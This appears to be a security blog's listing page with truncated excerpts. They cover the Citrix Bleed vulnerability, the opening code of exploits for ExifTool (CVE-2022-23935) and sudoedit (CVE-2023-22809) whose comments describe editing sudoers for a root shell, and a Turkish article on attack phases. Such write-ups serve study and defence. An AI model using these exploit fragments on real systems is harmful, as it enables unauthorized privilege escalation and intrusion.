Detecting Ransomware Threats: StopRansomware – LockBit 3.0 Exploits CVE-2023-4966 in Citrix Bleed Vulnerability
Hello to all of you. 🙂 Introduction: The recently discovered Citrix Bleed vulnerability (CVE-2023-4966) poses a serious threat to computer security. Stemming from a security flaw in Citrix products, this vulnerability has the potential to allow malicious actors to infiltrate systems and gain access to sensitive information. Vulnerability Description: Citrix Bleed points to a specific security vulnerability in Citrix products. This flaw, by permitting unauthorized access, enables attackers to breach systems and access user data. Exploiting this vulnerability, adversaries can infiltrate corporate networks and compromise confidential information. CVE-2023-4966 Details: The Citrix Bleed vulnerability is identified by the CVE-2023-4966 number. Originating from a code weakness in specific Citrix products, Citrix recommends users promptly address this issue by applying security patches. Affected Products/Versions: The Citrix Bleed vulnerability impacts specific Citrix products. The following versions of NetScaler ADC and Gateway devices are affected by this security flaw: NetScaler ADC and NetScaler Gateway 14.1-pre-14.1-8.50…
CVE-2022-23935 Exploit
This vulnerability causes command injection by mismanaging a $file =~ /\|$/ check in lib/Image/ExifTool.pm in ExifTool prior to 12.38. #!/usr/bin/python3 from pwn import * import base64 import sys class ExploitExiftools: def __init__(self,ip,port): self.ip = ip self.port = port self.p = log.progress(“”) def printBanner(self): print(“”” _____ __ __ ______ ___ ___ ___ ___ ___ ____ ___ ____ _____ / ____|\ \ / /| ____| |__ \ / _ \|__ \ |__ \ |__ \ |___ \ / _ \|___ \ | ____| | | \ \ / / | |__ ______ ) || | | | ) | ) |______ ) | __) || (_) | __) || |__ | | \ \/ / | __||______|/ / | | | | / / / /|______|/ / |__ < \__, ||__ < |___ \ | |____ \ / | |____ / /_ | |_| |/ /_ / /_ / /_ ___) |…
CVE-2023-22809 – sudo 1.8.0 – 1.9.12p1 – Privilege Escalation
#!/usr/bin/env bash # # Exploit Title: sudo 1.8.0 – 1.9.12p1 – Privilege Escalation # # CVE: CVE-2023-22809 # Vendor Homepage: https://www.sudo.ws/ # Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz # Version: 1.8.0 to 1.9.12p1 # Tested on: Ubuntu Server 22.04 – vim 8.2.4919 – sudo 1.9.9 # # Running this exploit on a vulnerable system allows a localiattacker to gain # a root shell on the machine. # # The exploit checks if the current user has privileges to run sudoedit or # sudo -e on a file as root. If so it will open the sudoers file for the # attacker to add a line to gain privileges on all the files and get a root # shell. EXPLOITABLE=$(sudo -l | grep -E “sudoedit|sudo -e” | grep -E “(root)” | cut -d ‘ ‘ -f 6-) if [ -z “$EXPLOITABLE” ]; then echo “> This user can’t run sudoedit as root” else echo…
Hackerların Sistemlerimize Saldırma Aşamaları
Değerli okurlar Merhabalar 🙂 Bu yazımda sizlere “Hackerların Sistemlerimize Saldırma Aşamaları?” başlığı altında bilgi vermeye çalışacağım. Umarım hepimiz için yararlı bir yazı olur. Yazımın başında belirtmeliyim ki bu konular hakkında uzman olduğumu söyleyemem ancak yeterli donanıma sahip olduğum konuları sizlerle paylaşmaya çalışıyorum. Şimdiden iyi okumalar. 😉 Belkide çoğumuz hackerların sistemlerimizi nasıl ele geçirebildiği konusunda henüz bir bilgi sahibi değilizdir. Hatta bazılarımız bilgisayarımızın başkasının kontrolü altında olup olmadığını dahi farkedemiyordur. Ama bu yazımı okuduktan sonra, aklınızdaki bazı sorulara cevap verebilecek donanıma sahip olabileceğinizi düşünüyorum. Hackerlar hedef bir sistemi ele geçirmek için şu 5 adımı takip ederler; Ön Bilgi Edinme Tarama Erişim Kazanma Erişimden Faydalanma İzleri Yok Etme şimdi gelin bu adımları detaylı bir şekilde inceleyelim. 1. Ön Bilgi Edinme Bu adımda saldırganlar saldıracakları hedef sistemi belirlerler ve hedef sistem hakkında bilgi toplamaya başlarlar. Hemen sonrasında hedefin domain name(alan adı) incelenir, whois(kim) sorgusu vb. yapılır. İşletim bilgilerine erişilebilen ana bilgisayarlar, açık…